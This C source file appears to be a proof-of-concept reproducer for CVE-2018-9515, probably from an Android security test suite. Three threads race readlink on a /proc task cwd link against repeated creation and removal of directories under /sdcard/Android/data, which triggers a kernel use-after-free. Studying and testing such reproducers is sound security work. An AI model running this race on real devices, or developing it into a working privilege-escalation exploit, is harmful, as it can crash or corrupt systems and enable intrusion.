1 #define _GNU_SOURCE
2 #include <pthread.h>
3 #include <err.h>
4 #include <stdio.h>
5 #include <unistd.h>
6 #include <string.h>
7 #include <time.h>
8 #include <sys/types.h>
9 #include <sys/stat.h>
10 #include <sys/syscall.h>
11 #include "../includes/common.h"
/*
 * Thread id of the main thread. main() stores the result of
 * syscall(__NR_gettid) here before it creates the workers, and uaf_worker()
 * reads it once to build its /proc/self/task/<tid>/cwd path.
 */
pid_t looper_pid;
/*
 * Reader thread. Until the timer from start_timer() expires, it repeatedly
 * calls readlink() on /proc/self/task/<looper_pid>/cwd, i.e. it asks the
 * kernel for the current working directory of the task whose id is stored
 * in looper_pid. The resolved path is NUL-terminated and then discarded;
 * nothing is printed or returned.
 *
 * NOTE(review): the function name and the CVE-2018-9515 directory used
 * elsewhere in this file suggest this is the read side of a race reproducer
 * - confirm against the advisory before relying on that reading.
 *
 * Always returns NULL; the argument is ignored.
 */
void *uaf_worker(__attribute__ ((unused)) void *unused) {
    /* "/proc/self/task/" + a decimal int + "/cwd" fits well within 100 bytes. */
    char task_cwd_link[100];
    sprintf(task_cwd_link, "/proc/self/task/%d/cwd", (int)looper_pid);

    for (time_t deadline = start_timer(); timer_active(deadline); ) {
        char resolved[1000];
        /* One byte is held back so the terminator below always fits. */
        int n = readlink(task_cwd_link, resolved, sizeof(resolved) - 1);
        if (n <= 0) {
            /* Failed or empty result: nothing to terminate, try again. */
            continue;
        }
        resolved[n] = 0;
    }

    return NULL;
}
/*
 * Directory-churn thread. It changes into
 * /sdcard/Android/data/CVE-2018-9515, removes any leftover "subdir", and
 * then, until the timer from start_timer() expires, loops over:
 *   mkdir("subdir") -> chdir("subdir") -> rmdir("../subdir") -> chdir("..")
 * so the working directory is repeatedly a directory that has just been
 * unlinked. Every call except the initial rmdir() is checked; a failure
 * terminates the whole process through err(1, ...).
 *
 * Always returns NULL; the argument is ignored.
 */
void *chaos_worker(__attribute__ ((unused)) void *unused) {
    if (chdir("/sdcard/Android/data/CVE-2018-9515") != 0) {
        err(1, "chdir");
    }
    /* Best-effort cleanup of a previous run; the result is ignored. */
    rmdir("subdir");

    for (time_t deadline = start_timer(); timer_active(deadline); ) {
        if (mkdir("subdir", 0777) != 0) {
            err(1, "mkdir");
        }
        if (chdir("subdir") != 0) {
            err(1, "chdir");
        }
        /* Removed while it is still the current working directory. */
        if (rmdir("../subdir") != 0) {
            err(1, "rmdir");
        }
        if (chdir("..") != 0) {
            err(1, "chdir");
        }
    }

    return NULL;
}
/*
 * Entry point. Records the main thread's id in looper_pid, starts
 * uaf_worker and chaos_worker, and then, until the timer from start_timer()
 * expires, creates and removes
 * /sdcard/Android/data/CVE-2018-9515/foobar in a tight loop.
 *
 * The workers are never joined: returning from main() ends the process and
 * the worker threads with it. A failed pthread_create(), mkdir() or rmdir()
 * inside the loop exits with status 1.
 */
int main(void) {
    /* Must be set before uaf_worker starts, because the worker reads it once. */
    looper_pid = syscall(__NR_gettid);

    pthread_t reader;
    if (pthread_create(&reader, NULL, uaf_worker, NULL) != 0) {
        errx(1, "pthread_create failed");
    }

    pthread_t churner;
    if (pthread_create(&churner, NULL, chaos_worker, NULL) != 0) {
        errx(1, "pthread_create failed");
    }

    char my_dir_name[100] = "/sdcard/Android/data/CVE-2018-9515/foobar";
    /* Best-effort cleanup of a previous run; the result is ignored. */
    rmdir(my_dir_name);

    for (time_t deadline = start_timer(); timer_active(deadline); ) {
        if (mkdir(my_dir_name, 0777) != 0) {
            err(1, "looper: mkdir");
        }
        if (rmdir(my_dir_name) != 0) {
            err(1, "looper: rmdir");
        }
    }

    return 0;
}